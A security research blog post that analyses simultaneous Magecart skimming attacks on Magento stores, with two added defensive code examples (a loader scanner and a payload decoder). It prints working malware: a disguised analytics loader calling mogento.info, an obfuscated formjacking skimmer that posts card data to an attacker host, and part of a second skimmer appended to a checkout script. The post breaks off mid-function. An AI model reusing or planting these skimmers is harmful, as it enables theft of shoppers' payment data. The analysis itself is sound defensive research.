
PerimeterX Research Team Uncovers New Trend in Magecart Attacks: Multiple Magecart Groups Attacking Simultaneously

November 3, 2019
  • Mickey Alton
  • Research Team Leader

Magecart attackers are tripping over each other for your users’ data.

The PerimeterX research team has recently investigated multiple Magecart attacks and has observed an interesting new trend: multiple Magecart attacks are skimming credit cards from the same sites at the same time. Each observed attack used a different technique, and the simultaneous attacks did not appear to be coordinated. There is also a larger trend in which Magecart attacks are becoming more organized, with attackers sharing tools and targeting sites that run popular e-commerce platforms. In some cases the groups are running attack campaigns simultaneously without realizing it, each trying to maximize reach while minimizing its level of effort.

Our research team began investigating the Magecart attack on Sixth June as soon as it was reported. When an attack is brought to our team’s attention, they delve deep into the kill chain to get insights on how the attack is evolving. As we dug deeper into the attack, we started to piece together the chain of skimmers, the hosting sites, other affected sites and the attack techniques. Additionally, we made an interesting discovery of simultaneous Magecart attacks on PEXSuperstore.com. We have informed the website owners mentioned in this blog about their respective attacks prior to publishing this information.

In this blog, we will detail our findings on the Sixth June Magecart attack and show how we investigated the entire kill chain, leading to the discovery of the new trend of simultaneous skimming attacks on websites. The PEXSuperstore.com attack is an example of this trend of two attacks happening simultaneously.

The following attack chart shows the path that our research team took to discover this new trend. We started with Sixth June and found the skimming data being posted to the hostname mogento.info which is also hosting the skimmer. Scanning the web for other sites posting data to mogento.info, we found other sites infected by the same skimmer, including PEXSuperstore.com. From the full analysis of PEXSuperstore.com, we found a second Magecart attacker injecting yet another skimmer and exfiltrating card data to https://assetstorage.net/, a site registered in Russia less than two months ago. The relatively short age of the domain is an indicator of its suspicious intent.

Multiple Magecart groups attacking simultaneously

The two skimmers were completely different from each other in terms of code, obfuscation level and complexity. But both attacks targeted Magento-based sites, used similar methods of code injection and served malicious first-party code to unsuspecting users. The Sixth June attacker directly compromised the websites with a decoy snippet that masqueraded as a Google Analytics script. On PEXSuperstore, the same attacker used a much simpler loader than on Sixth June. Here is the simpler snippet variant:

  <script type="text/javascript" src="https://www.mogento.info/apiV4/apiV3.js"></script>

The decoy script then pulled in an obfuscated snippet that loads the skimmer from a remote server controlled by the attacker. Because the malicious code is served from the compromised site itself, this direct site compromise is called a first-party attack. The second Magecart attacker also compromised the website, but this time without planting a loader script: the attacker modified the first-party script that handles the checkout process and appended skimming code at the bottom of the original script.

Sixth June Magecart attack breakdown

On October 28th, Sixth June was mentioned as a new skimming victim on Twitter. The skimmer had been present on the Magento-based website for over a week before Sixth June addressed it. As noted by the first researcher, Jenkins, the malicious code did not trigger for non-US visitors or for users running Linux.

Stage 1: Skimmers compromise the website.

The website was compromised by the attacker to add a malicious inline JavaScript snippet to the website’s code. The exact mode of compromise could not be determined, but the attacker did modify pages served from Sixth June web servers.

Stage 2: Skimmers place a malicious inline script.

An inline script was disguised as a legitimate Google Analytics tag in the source code of the website.

<!-- Google Tag Manager -->
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObjects']=r;a=s.createElement
(g),m=s.getElementsByTagName(g)[0];if(i.location.href.indexOf(i.atob(r))
>0){a.async=1;a.src='https://'+i.atob(o);m.parentNode.insertBefore(a,m)}})
(window,document,'bW9nZW50by5pbmZvL2FwaVY0L2FwaVYzLmpz','script','Y2hlY2tvdXQ=',
'//www.google-analytics.com/analytics.js','ga');</script>
<!-- End Google Tag Manager -->
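The decoy passes its real script location and its trigger keyword as base64 strings that only `atob` turns back into text. The following is an added example, not PerimeterX code: a small Node.js check that decodes such literals in inline scripts and flags hosts outside an assumed allowlist; the sample HTML is the snippet above, the allowlist is assumed.

```javascript
// Added example (not PerimeterX code): decode the base64 arguments of a decoy
// "Google Analytics" inline loader like the one found on Sixth June and flag
// script hosts that are not on the site's allowlist. Assumes Node.js; the
// sample HTML is the snippet from the post, the allowlist is assumed.

const SAMPLE_HTML = `<!-- Google Tag Manager -->
<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObjects']=r;a=s.createElement
(g),m=s.getElementsByTagName(g)[0];if(i.location.href.indexOf(i.atob(r))
>0){a.async=1;a.src='https://'+i.atob(o);m.parentNode.insertBefore(a,m)}})
(window,document,'bW9nZW50by5pbmZvL2FwaVY0L2FwaVYzLmpz','script','Y2hlY2tvdXQ=',
'//www.google-analytics.com/analytics.js','ga');</script>
<!-- End Google Tag Manager -->`;

// Hosts this site is known to load scripts from (assumed allowlist).
const ALLOWED_HOSTS = new Set(['www.google-analytics.com', 'www.googletagmanager.com']);

// A quoted literal of 8+ base64 characters. The genuine GA snippet passes URLs
// and short names here, never base64, so any decodable literal is notable.
const B64_LITERAL = /['"]([A-Za-z0-9+/]{8,}={0,2})['"]/g;
const HOST_PREFIX = /^([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?:\/|$)/i;

// Return every literal that decodes to printable ASCII, with its decoding.
function decodeBase64Literals(script) {
  const out = [];
  for (const m of script.matchAll(B64_LITERAL)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(decoded)) out.push({ encoded: m[1], decoded });
  }
  return out;
}

// Scan each inline <script> that calls atob(), decode its base64 literals and
// report (a) hosts outside the allowlist and (b) non-host strings used next to
// location.href, i.e. path keywords that gate when the loader fires.
function analyzeInlineLoaders(html) {
  const findings = { decoded: [], unknownHosts: [], pathTriggers: [] };
  for (const m of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const body = m[1];
    if (!/\batob\s*\(/.test(body)) continue;   // plain GA snippets never call atob
    for (const { decoded } of decodeBase64Literals(body)) {
      findings.decoded.push(decoded);
      const host = decoded.match(HOST_PREFIX);
      if (host) {
        if (!ALLOWED_HOSTS.has(host[1].toLowerCase())) findings.unknownHosts.push(host[1]);
      } else if (/location\.href/.test(body)) {
        findings.pathTriggers.push(decoded);
      }
    }
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(analyzeInlineLoaders(SAMPLE_HTML));
}
```

On the snippet above this reports `mogento.info` as an unknown host and `checkout` as the path keyword that gates the loader.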

Stage 3: Inline loader script loads the obfuscated skimmer script

The inline script loaded another, heavily obfuscated script from the external host https://mogento.info/apiV4/apiV3.js, hosted on a French ASN and registered in the Netherlands on October 4, 2019. Note the attempt to deceive by using a domain name similar to Magento. This script is a loader that decrypts and executes the embedded inner script.

(function() {
    var G0h = {};
    var Vnn = (0 * "\x7fO:\x89npRi=,hwb_6})F8"["charCodeAt"](17) + 1.0);
    Ag6 = "";
    var VYd = ("kd:j4cP\x88;*\x87$H2\x7f"["length"] * 0 + 1.0);
    var H1Y = "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";
    xx = "".constructor;
    var J42 = (4.0 + "v\x87gNkA3hEu|\x88UzC"["length"] * 2);
    for (var Eqq = (0.0 + "\x80D-vV8I\x8b?"["length"] * 0); Eqq < H1Y["l" + (88 > 29 ? "\x65" : "\x5e") + "" + "" + (62 > 23 ? "\x6e" : "\x67") + "gth"]; 
        Eqq += ("^%Ir?|g)@d~>X,"["charCodeAt"](12) * 0 + 2.0)) {
        Ag6 = Ag6 + String["from" + (65 > 41 ? "\x43" : "\x39") + "ha" + "rCo" + (58 > 35 ? "\x64" : "\x5a") + "e"](parseInt(H1Y["s" +
        (96 > 28 ? "\x75" : "\x70") + "bs" + "" + (95 > 22 ? "\x74" : "\x6c") + "r"]
            (Eqq, ("A~V+YCtW0u@q{Kl?Ze2("["charCodeAt"](15) * 0 + 2.0)), J42));
    }
    ;VYd = "setTimeout(Ag6," + Vnn;
    VYd = VYd + ");";
    G0h["" + (98 > 24 ? "\x74" : "\x6b") + "oSt" + "r" + (74 > 23 ? "\x69" : "\x61") + "ng"] = xx["con" + (85 > 5 ? "\x73" : "\x6a") + "truct" + "" +
    (87 > 5 ? "\x6f" : "\x67") + "r"](VYd);
    s = G0h + ".";
}
)();

Stage 4: Obfuscated skimmer script exfiltrates credit card data

The malicious script imported from mogento.info loaded an inner script, also heavily obfuscated. This script is the skimmer itself: it registers persistent event listeners and reads the values of all document object model (DOM) input elements. The script also runs on checkout pages, which contain highly sensitive personally identifiable information (PII) and payment details.

The final formjacking script of the skimmer:

var Y6x=("7Faq'{Cic6\x7f4"["length"]*41+8.0);var laV=(2.0+")OR\x80\x8b"["length"]*85);jQuery(document)[""+(60>39?"\x72":"\x6d")+"ead"+"y"](function() {
$(document)[""+""+(65>46?"\x6f":"\x68")+"n"]("M2cqlxi3scOk"["replace"](/[qsM23xO]/g,""),"9xbpsuit[HtWo4n"["replace"](/[\[Wxi9sH4p]/g,""), function(){
var snd =null;var eRr="]YR%qxWGFZN`taVyq`nIupls"[(2.0+"QO?2qG&\x82U#FD"["length"]*2457308705)["toString"]((0*"\x820v/njr\x89mu)\x85=\x8af,("["charCodeAt"](16)+32.0))](/[YtGlIpx\]\%\`yVZ]/g,"");var inp=document[""+"queryS"+(95>40?"\x65":"\x60")+"lectorAll"]("Ji)n+pA[u<tz,1 zs0e&l6e;`cEtYH,Q wMtvIeV1x7tIfa&rNeWZa6,q; Cc4Lh0e[c2kYb@o&x"["replace"](/[1WN\@I7\`VAH\+w\<Y\;0\&\)fMLC2EJq4QvZ\[z6]/g,""));for (var i=(0*"JW56a\x8b;Am"["length"]+0.0);i<inp[""+(61>27?"\x6c":"\x65")+"e"+"ngt"+(57>34?"\x68":"\x62")+""];i++){ if(inp[i][""+(56>34?"\x76":"\x6c")+"alu"+"e"]["l"+"eng"+(87>29?"\x74":"\x6f")+"h"]>("\x89X+\x82Y_G0\x866t\x8b'"["length"]*0+0.0) && inp[i]["v"+""+(62>37?"\x61":"\x5b")+"lue"]["len"+(73>42?"\x67":"\x61")+"t"+"h"]<(4*"r\x84#n[<6LDvWf."["length"]+8.0)) { var nme=inp[i]["i"+"d"];if(nme==""[("bac\x88Ar'E#\x80"["charCodeAt"](6)*1529811105+23.0)["toString"]((4.0+"6p5lzX\x88+"["length"]*4))]("zIoQzIsn3f","")) { nme=i;VuS=(0*"<vMF|:AT%\x81)\x82\x85D"["charCodeAt"](13)+31.0); } snd+=inp[i][""+""+(87>35?"\x69":"\x5f")+"d"]+"Q="["replace"](/[Q]/g,"")+inp[i][""+(99>27?"\x76":"\x6e")+"alu"+"e"]+"`&"[(1625808742*"VSNWGd@?{J+mk(L"["length"]+3.0)["toString"]((0*"\x8a1%rLVC\x80Ug#&R)"["charCodeAt"](8)+31.0))](/[\`]/g,"");iF5="B`K(LNkn7SP20Vi=aUsWowrf"[(",-V(@cZ\x60vxrY;:wpD'\x80<"["charCodeAt"](17)*756094986+8.0)["toString"]((32.0+"S|RZ#3VX{CzcD\x7fmj"["charCodeAt"](7)*0))](/[\=0k\`PNiUwB7rW\(]/g,"");} } if(snd!=null) { var regexp = /(3|4|5|6)[0-9]{13,16}/gi;ZHq=(8.0+"jMa.vcbkhU>\x89g)\x60*173"["charCodeAt"](17)*4);var re=snd[""+(86>6?"\x72":"\x6c")+"e"+"plac"+(54>48?"\x65":"\x5c")+""](/ 
/g,""[("a>%<Y\x60_}c\x89&8d"["charCodeAt"](3)*840115113+29.0)["toString"]((35.0+"I)+=\x81[Y\x83kmnC/j"["charCodeAt"](3)*0))]("kZeHOlnoc8",""));i2y="uK_KFzXMLO@RObvak6AYdI"[("ys+)xGEYmLK"["charCodeAt"](3)*1229436751+18.0)["toString"]((5.0+"i%xhW#o,.IV5\x81\x89w"["length"]*2))](/[RXabA6FLu\@d\_]/g,"");re=re["rep"+(59>27?"\x6c":"\x65")+"a"+""+(69>24?"\x63":"\x5d")+"e"](/-/g,""[(2.0+"=%7qd"["length"]*5897540892)["toString"]((0.0+"mRZ1twXK"["length"]*4))]("REyxe9pHTw",""));nsS="FtiANYFn8pvRSNmRd5r<6"["replace"](/[5p\<iF8NR]/g,"");K96="GNbtHcqAWoZah4SmDZtk~j"["replace"](/[\~AcS4NGDato]/g,"");var matches = re[""+"mat"+(99>12?"\x63":"\x5c")+"h"](regexp);X3v="lAdQUr9NKZMVW]7Xoh6TnG8U"[("/RqciS\x83hM\x80\x7f>|WwH"["charCodeAt"](13)*685777392+14.0)["toString"](("c=.h6U>e@(JCSdz"["charCodeAt"](8)*0+36.0))](/[N6\]AMVrXolQ8nK]/g,"");if(matches!=null){
if(qTw(matches[("\x88\x7fQIAyo{=mX"["length"]*0+0.0)])==true){
snd=L1l(snd+"8w&m(sehro8pG="["replace"](/[wGm\(er8]/g,"")+window["loca"+(92>6?"\x74":"\x6f")+""+"io"+(61>33?"\x6e":"\x67")+""][""+(95>0?"\x68":"\x62")+"os"+"t"]+"MT&McvaoIr)d6_U1W2-93yz="["replace"](/[ovWT\-9\)MzyUI6]/g,"")+matches[(0.0+"]p\x87\x86eavHO>Ls-K"["charCodeAt"](13)*0)]);A7Z="pA%9zkF2uWeV%JYG3`N>6v8"["replace"](/[\`\>peFWGv\%Yz2]/g,"");var NmK="vFdgd&Vs;n`2+m)ZiNFB!b"["replace"](/[\;i\+\&F\)\!Vg\`v]/g,"");var gOB="li(rk4QyF9>L8vi=0u)eo3"[("/&63uz*0Q("["charCodeAt"](9)*886198616+27.0)["toString"](("7*T?\x882YHdE>O\x84,^;6"["charCodeAt"](5)*0+33.0))](/[F\(\)\=vLluQ\>ko]/g,"");var Vo2="9zwr#lwA*7@TVWvs6<ifUC"[(47.0+"(:\x82D_BJ87KryM^"["charCodeAt"](8)*644508084)["toString"]((33.0+"]C(:T*^@,[}Ygps?"["charCodeAt"](11)*0))](/[\<s\*f\#\@WVwU9]/g,"");tI1="1#RG2(y~gt4Y72#3x8fz/s"[("8\x81\x83N7'~X1_"["charCodeAt"](4)*443402384+13.0)["toString"]((9.0+"\x7ftq5}mJ\x87oMZ"["length"]*2))](/[\~x\(\/tf1GY7\#]/g,"");NMU="DzpnEkZPqA0pRTb9T=K5l]z"["replace"](/[9ERDP\]AbZ5\=p]/g,"");TT4=(18.0+"q\x80p=Nv[\x82%Mac\x7f>\x8b"["charCodeAt"](9)*2);var D9Q=(24.0+"/\x8ajDi<s_u\x890.AQ"["charCodeAt"](13)*0);var key=L1l(window[""+"loca"+(55>3?"\x74":"\x6c")+"ion"]["h"+(79>40?"\x6f":"\x65")+""+""+(65>12?"\x73":"\x6d")+"t"]);qaD="2L-;b1xesLDGJ!H3P9NrOZBS"["replace"](/[1Z9rB2\!sDJ\-e3\;]/g,"");var data="W`phwn7+gu="["replace"](/[\+wWuh\`7]/g,"")+snd+"C&cPkMe>ly~="["replace"](/[M\>c\~PCl]/g,"")+key;var Kqv=(2.0+"C\x86$pZ"["length"]*95);urll ="Q1h5tZt*pF)sL:;/2J/QKw4KwQw4.[m5o*g!eIn)t[oD.OiJHnEf8`o=/(>i4JmF#aNgJ~e%sS/(v2iXs4aH8-`~m]a+sKtTKe@r>cbZa1r!dZX-uaUm5e2xC_903.VpOnTg"["replace"](/[1Q2H\!5\+\%\>\#\)b\~TN\;K\=V\[u\]9IE\(UCFSODJ\@348\*LX\`Z]/g,"");jri="CMwi0S8gBFnr>Xzd`xKCI2ql"["replace"](/[Cz2KS0Fwgr\`\>q]/g,"");jQuery["a"+(94>37?"\x6a":"\x61")+""+"a"+(63>31?"\x78":"\x73")+""]({ type:"pPUaOESiT"["replace"](/[iUpaE]/g,""), url: urll, data:data                }) } }}
})});vwj=("#-O25Vo0%qy"["charCodeAt"](4)*3+47.0);function qTw(s) { var v ="e0s1L2;3A4k<5/6D7]8y*9"[(1625808742*"3I9gZ.\x821_(\x81j5i\x80"["length"]+3.0)["toString"]((0*"hv~7c=p>R\x89[Q"["charCodeAt"](10)+31.0))](/[A\<\*\/k\;LDy\]es]/g,"");u1J="O2S;UcWnoEFCxnGZ~eP%(L3D"[("[5B\x88/\x8bfE6"["length"]*5600767423+2.0)["toString"](("BJx\x8bZ)aNDi8u\x89l'\x60r_*"["charCodeAt"](10)*0+35.0))](/[SEGnOC\;\~e3\%c\(]/g,"");var w =""[("q\x8bX/o-,"["length"]*3483875876+1.0)["toString"]((31.0+"xu\x81XPGk7\x82\x88_vW"["charCodeAt"](5)*0))]("o97zIjFxdS","");for (i=(0*"w'nK%>:MHb1*o"["charCodeAt"](4)+0.0); i < s[""+(86>14?"\x6c":"\x62")+"eng"+""+(100>9?"\x74":"\x6d")+"h"]; i++) { x = s["c"+""+(57>3?"\x68":"\x60")+"arAt"](i);if (v["i"+"nde"+(91>40?"\x78":"\x72")+"Of"](x,(":cR^qy|4;we\x83U@HM0"["charCodeAt"](12)*0+0.0)) != -(1.0+"4IPgY"["length"]*0)) w += x;NYA=("{T$z\x60C,/\x802"["length"]*45+4.0);} j = w[""+"lengt"+(88>4?"\x68":"\x5e")+""] / (2.0+"e^;],O\x89u}s|I_-8%l\x84X"["charCodeAt"](18)*0);var dgD=(22.0+"b*\x80nM(@g+}\x60CG"["charCodeAt"](5)*7);k = Math["f"+"loo"+(86>32?"\x72":"\x6c")+""](j);LFe="=s8507Gl(V~m2YXBJqfTN++V"[(274012709*"gU\x60iYxO;9y#Z\x84z\x89hSE"["charCodeAt"](4)+32.0)["toString"](("Hq\x83Rjbe%"["length"]*3+7.0))](/[7G\~8Tq\=\(m\+B5Y]/g,"");m = Math["ce"+(65>7?"\x69":"\x63")+""+"l"](j) - k;B3t="i4JwbuOWwR+lxFNTQUXPHSZx1"[("7-5wGf%V^\x88|jk}"["charCodeAt"](2)*460134549+36.0)["toString"]((31.0+"|R6\x88g\x87ZlhV9PI\x8aB})y"["charCodeAt"](14)*0))](/[\+FHxSuUOwX4iT]/g,"");c = ("7UG{jIZcE8Kh-/\x89"["charCodeAt"](13)*0+0.0);for (i=(0.0+"B7\x80?k["["length"]*0); i<k; i++) { a = w[""+(92>11?"\x63":"\x5e")+"h"+"a"+(60>17?"\x72":"\x6c")+"At"](i*("PW~(a@Dn.'#i5"["length"]*0+2.0)+m) * (0*",)BJ4\x88Y\x8a*vnc"["length"]+2.0);c += a > ("\x60wqH83sQj?\x87tuz2\x856x%"["charCodeAt"](7)*0+9.0) ? 
Math[""+"floo"+(71>0?"\x72":"\x68")+""](a/(0*"#yqJ9:4hu%\x82\x60p$\x8b"["length"]+10.0) + a%(10.0+"\x7fQs=kY~tO&{\x82"["charCodeAt"](5)*0)) : a;} for (i=("S3\x60hv|>n:]t"["length"]*0+0.0); i<k+m; i++) c += w["cha"+(100>48?"\x72":"\x68")+""+""+(100>15?"\x41":"\x3a")+"t"](i*("}?5Um-\x82DlC=&."["length"]*0+2.0)+1-m) * (0*"R$\x85n_co+%^qP\x60-"["length"]+1.0);return (c%("a]5V0Hv\x85\x80I=O-\x84"["length"]*0+10.0) == (0*"&|wIg\x60B0~"["length"]+0.0));iw7="(Yow2nhGDZ#u]X_Cj~wKG"[("\x81~r#}tk<,sN"["length"]*2217011921+2.0)["toString"](("pGwlU$(fsPR2n\x80:KgOL"["charCodeAt"](18)*0+31.0))](/[\~D\]\#\(o\_Kh2C]/g,"");} function L1l(theText) {
output = new String;Niv=("?jypr\x60h-\x841x}fSi_\x89"["charCodeAt"](13)*3+31.0);Mdh="o5!P>eVi5g1d9)QB7#kw~u"["replace"](/[we\!\)B\~i\>\#dgo]/g,"");Temp = new Array();var bdG="gPEh2-coLvl)]WyD*/3`ip#r"[(54.0+"nTh-B\x82H+EJ"["charCodeAt"](9)*398482492)["toString"]((2*"_\x8b'iORH>zX6"["length"]+10.0))](/[\)\`\/gvh\]\#y\-\*oiP]/g,"");Temp2 = new Array();nvC=("6J;y4~"["length"]*21+4.0);TextSize = theText[""+"lengt"+(68>23?"\x68":"\x5e")+""];for (i = (0.0+"&,*\x80fs"["length"]*0); i < TextSize; i++) { rnd = Math["r"+(70>31?"\x6f":"\x69")+""+""+(83>19?"\x75":"\x6c")+"nd"](Math[""+(89>28?"\x72":"\x68")+"ando"+"m"]() * (24*"@Ietl"["length"]+2.0)) + ("6\x81HB->[k@x/.n}ey"["charCodeAt"](8)*1+4.0);Temp[i] = theText["cha"+(75>28?"\x72":"\x6c")+""+"Co"+(66>19?"\x64":"\x5d")+"eAt"](i) + rnd;var y$j="c04Hx-t;jNlin+g>5VLi&OUf"[("\x82i?\x87\x60Z}w=61\x85X"["charCodeAt"](8)*978075952+46.0)["toString"]((8.0+"R\x88p{lLB%\x85K'\x86x5"["length"]*2))](/[0\;L\-UV\>\+jl\&Hnc]/g,"");nxo="RlPM`sZLCzie`7ObK&3aBrk"["replace"](/[ROrzP\&La\`sKe]/g,"");gbS=("J\x7fe|O0YC:F\x81L'6o]B^?"["charCodeAt"](16)*1+46.0);Temp2[i] = rnd;}
for (i = (0.0+"Db#\x86FU>Hg;R@"["charCodeAt"](11)*0); i < TextSize; i++) { output += String["from"+(77>16?"\x43":"\x3a")+"har"+"Cod"+(67>37?"\x65":"\x5f")+""](Temp[i], Temp2[i]);}
return output;cvA="AL9)cipiSQ)a<2PB6XUg/AO"[("\x8b,_TrC"["length"]*4064521855+3.0)["toString"]((31.0+"Okt%}QHAEUg's+"["charCodeAt"](13)*0))](/[\/A6LPiQ\)U\<]/g,"");} ;CiZ=(5.0+"l8Om;J}ID"["length"]*47)
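Before posting, the skimmer runs the collected fields through its L1l routine, which turns each character c into `String.fromCharCode(c + rnd, rnd)` with `rnd = Math.round(Math.random() * 122) + 68`, and sends `png=` + L1l(fields) + `&key=` + L1l(host). The following is an added example, not PerimeterX code or the skimmer's own: a Node.js decoder an incident responder could run over a captured request body to confirm which fields left the page; the sample payload is constructed, not a real capture.

```javascript
// Added example (not PerimeterX code or the skimmer's own): incident-response
// decoder for the Stage 4 skimmer's L1l encoding. Each character c of the
// plaintext was sent as the pair (c + rnd, rnd) with rnd in [68, 190], and the
// POST body is "png=" + L1l(fields) + "&key=" + L1l(host). Assumes Node.js;
// the sample payload below is constructed, not a real capture.

const RND_MIN = 68, RND_MAX = 68 + 122;   // offset range the skimmer can produce

// Constructed stand-in for the skimmer's encoder, used only to build the sample.
function encodeLikeL1l(text) {
  let out = '';
  for (let i = 0; i < text.length; i++) {
    const rnd = Math.round(Math.random() * 122) + 68;
    out += String.fromCharCode(text.charCodeAt(i) + rnd, rnd);
  }
  return out;
}

// Recover the plaintext: every second code unit is the offset that was added
// to the one before it. An offset outside the skimmer's range means this is
// not an L1l payload (or it was mangled in transit), so refuse rather than guess.
function decodeL1l(encoded) {
  if (encoded.length % 2 !== 0) throw new Error('odd length: not an L1l payload');
  let text = '';
  for (let i = 0; i < encoded.length; i += 2) {
    const rnd = encoded.charCodeAt(i + 1);
    if (rnd < RND_MIN || rnd > RND_MAX) throw new Error(`offset ${rnd} at ${i} outside L1l range`);
    text += String.fromCharCode(encoded.charCodeAt(i) - rnd);
  }
  return text;
}

// Split a captured body into the stolen fields and the site key. The skimmer
// initialises its buffer as null and then concatenates, so the decoded field
// string starts with the literal "null"; strip it. "&" and "=" never occur in
// L1l output (every code unit is >= 68), so splitting on "&key=" is safe.
function parseCapturedBody(body) {
  const m = body.match(/^png=([\s\S]*)&key=([\s\S]*)$/);
  if (!m) throw new Error('body is not shaped png=...&key=...');
  let fieldStr = decodeL1l(m[1]);
  if (fieldStr.startsWith('null')) fieldStr = fieldStr.slice(4);
  const fields = {};
  for (const [k, v] of new URLSearchParams(fieldStr)) fields[k] = v;
  return { key: decodeL1l(m[2]), fields };
}

// Constructed sample: invented field ids and values plus the standard Visa
// test number, laid out the way the skimmer builds its buffer.
const SAMPLE_FIELDS = 'nullbilling:email=jane@example.test&billing:postcode=12345'
  + '&shop=shop.example&card_123=4111111111111111';
const SAMPLE_BODY = 'png=' + encodeLikeL1l(SAMPLE_FIELDS) + '&key=' + encodeLikeL1l('shop.example');

if (typeof require !== 'undefined' && require.main === module) {
  console.log(parseCapturedBody(SAMPLE_BODY));
}
```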

We also found the same exact skimmer on five other Magento-based sites including PEXSuperstore.com. Similar skimmer loader scripts were found on 91 Magento-based sites.

Multiple Simultaneous Magecart attacks: Second Skimmer on PEXSuperstore.com

While examining PEXSuperstore.com, we noticed another suspicious POST request being sent to a completely different domain: https://assetstorage.net/, registered in Russia. This skimmer was on the checkout page sniffing users’ PII data and sending POST requests to assetstorage.net. When placing an order, the compromised first-party checkout script is called and executes the skimmer.

Stage 1: Website compromise

The PerimeterX research team found that the skimmer script is placed on the web server owned by the company. While we don’t know the exact method used to compromise the web server, we can only surmise that its security controls were bypassed to make changes to the website.

Stage 2: Placing the skimmer script

Unlike the attack on Sixth June, there is no loader script. The checkout script was modified to execute the skimmer on every checkout, as shown below. The first 960 lines of the Magento checkout script are harmless code.

/**
 * Magento
 *
 * NOTICE OF LICENSE
 *
 * This source file is subject to the Academic Free License (AFL 3.0)
 * that is bundled with this package in the file LICENSE_AFL.txt.
 * It is also available through the world-wide-web at this URL:
 * http://opensource.org/licenses/afl-3.0.php
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to license@magento.com so we can send you a copy immediately.
 *
 * DISCLAIMER
 *
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to http://www.magento.com for more information.
 *
 * @category    design
 * @package     base_default
 * @copyright   Copyright (c) 2006-2014 X.commerce, Inc. (http://www.magento.com)
 * @license     http://opensource.org/licenses/afl-3.0.php  Academic Free License (AFL 3.0)
 */
var Checkout = Class.create();
Checkout.prototype = {
    initialize: function(accordion, urls){
        this.accordion = accordion;
        this.progressUrl = urls.progress;
        this.reviewUrl = urls.review;
        this.saveMethodUrl = urls.saveMethod;
        this.failureUrl = urls.failure;
        this.billingForm = false;
        this.shippingForm= false;
        this.syncBillingShipping = false;
        this.method = '';
        this.payment = '';
        this.loadWaiting = false;
        this.steps = ['login', 'billing', 'shipping', 'shipping_method', 'payment', 'review'];
        //We use billing as beginning step since progress bar tracks from billing
        this.currentStep = 'billing';

        this.accordion.sections.each(function(section) {
            Event.observe($(section).down('.step-title'), 'click', this._onSectionClick.bindAsEventListener(this));
        }.bind(this));

        this.accordion.disallowAccessToNextSections = true;
    },

    /**
     * Section header click handler
     *
     * @param event
     */
    _onSectionClick: function(event) {
        var section = $(Event.element(event).up().up());
        if (section.hasClassName('allow')) {
            Event.stop(event);
            this.gotoSection(section.readAttribute('id').replace('opc-', ''), false);
            return false;
        }
    },

    ajaxFailure: function(){
        location.href = this.failureUrl;
    },

    reloadProgressBlock: function(toStep) {
        this.reloadStep(toStep);
        if (this.syncBillingShipping) {
            this.syncBillingShipping = false;
            this.reloadStep('shipping');
        }
    },

Below is part of the skimmer code added at the bottom of the original script:

var _$_a5d5=(function(i,k)
{
    var f=i.length;
    var n=[];
    for(var m=0;m< f;m++)
    {
        n[m]= i.charAt(m)
    }
    ;
    for(var m=0;m< f;m++)
    {
        var q=k* (m+ 105)+ (k% 41322);
        var p=k* (m+ 218)+ (k% 52726);
        var o=q% f;
        var g=p% f;
        var a=n[o];
        n[o]= n[g];n[g]= a;k= (q+ p)% 1694965
    }
    ;
    var d=String.fromCharCode(127);
    var j='';
    var c='\x25';
    var h='\x23\x31';
    var e='\x25';
    var b='\x23\x30';
    var l='\x23';
    return n.join(j).split(c).join(d).split(h).join(e).split(b).join(l).split(d)
}
)("rQinuNemb%ica_pCmrimtnstAtc_%usbelncbteniacaxey#lolh%otlchot0euxlan%1itneckraiCNamdtD8gs/h-rafun%ttec#nnot0oczlc0ceCmsci%ln#kaR-i%eUh:%Ycsicdn:rcnfehke\\%c0e d\\cvoCme1%siiyten_elntagnoelosiasf%%uh.strsobkl%eSbma#cs#heatttmncmeCrt%hianoha_oei7t0tollr*sbeadtus4tlCoO_da%Abirp%adn_:Ce%%unTH\\Pciiln\\jiftsrie/12oiatbhl|crgnhg0@+fCe%o%ii%%Et%i%aai%h0zr_r#\\_e7nirtp:urs%eatp0#%oxgdioga:todpN%|%%hmottc\\ltelWn:8s%m#o:ibcd%gh:ti%yc#Kb%:eiega:d%ai%nikpNsg\\selro00bccM2%___noeeghellrna\\pposrc#l%nBrhe%siGc3:=_\\bMPhfsel#i0aalYset^%%lSsTyze/iveclS%ru2to\\%/exNnsg#2ye0%%stermacL%Vocl_0lev#tim%oAl%_6eFlm%Jneo%Oigro/#:tXgZdbutelgaejitanfpnri+uve%zzguiif5ec89n/|ew20lahi#pNeng0nd8cno%a#eealaonr%%kjyi%t%0eiighIitdnx0ac%_N#Cktettrp4e1cqc%deuOieun",975551);
setTimeout(function()
{
    document[_$_a5d5[0]]= _$_a5d5[1];document[_$_a5d5[2]]= _$_a5d5[3];document[_$_a5d5[4]]= _$_a5d5[5];document[_$_a5d5[6]]= _$_a5d5[7];document[_$_a5d5[8]]= _$_a5d5[9];document[_$_a5d5[10]]= _$_a5d5[11];a();if(( new RegExp(_$_a5d5[14]))[_$_a5d5[13]](window[_$_a5d5[12]]))
    {
        setInterval(function()
        {
            c()
        }
        ,3000)
    }
    //11
    function c()
    {
        if(jQuery(document[_$_a5d5[10]]))
        {
            if(jQuery(document[_$_a5d5[10]])[_$_a5d5[15]](document[_$_a5d5[8]])== false)
            {
                a();return
            }

        }

    }
    function a()
    {
        jQuery(document[_$_a5d5[10]])[_$_a5d5[16]](function()
        {
            e()
        }
        );if(jQuery(document[_$_a5d5[10]]))
        {
            jQuery(document[_$_a5d5[10]])[_$_a5d5[17]](document[_$_a5d5[8]])
        }

    }
    function e()
    {
        var a;//40
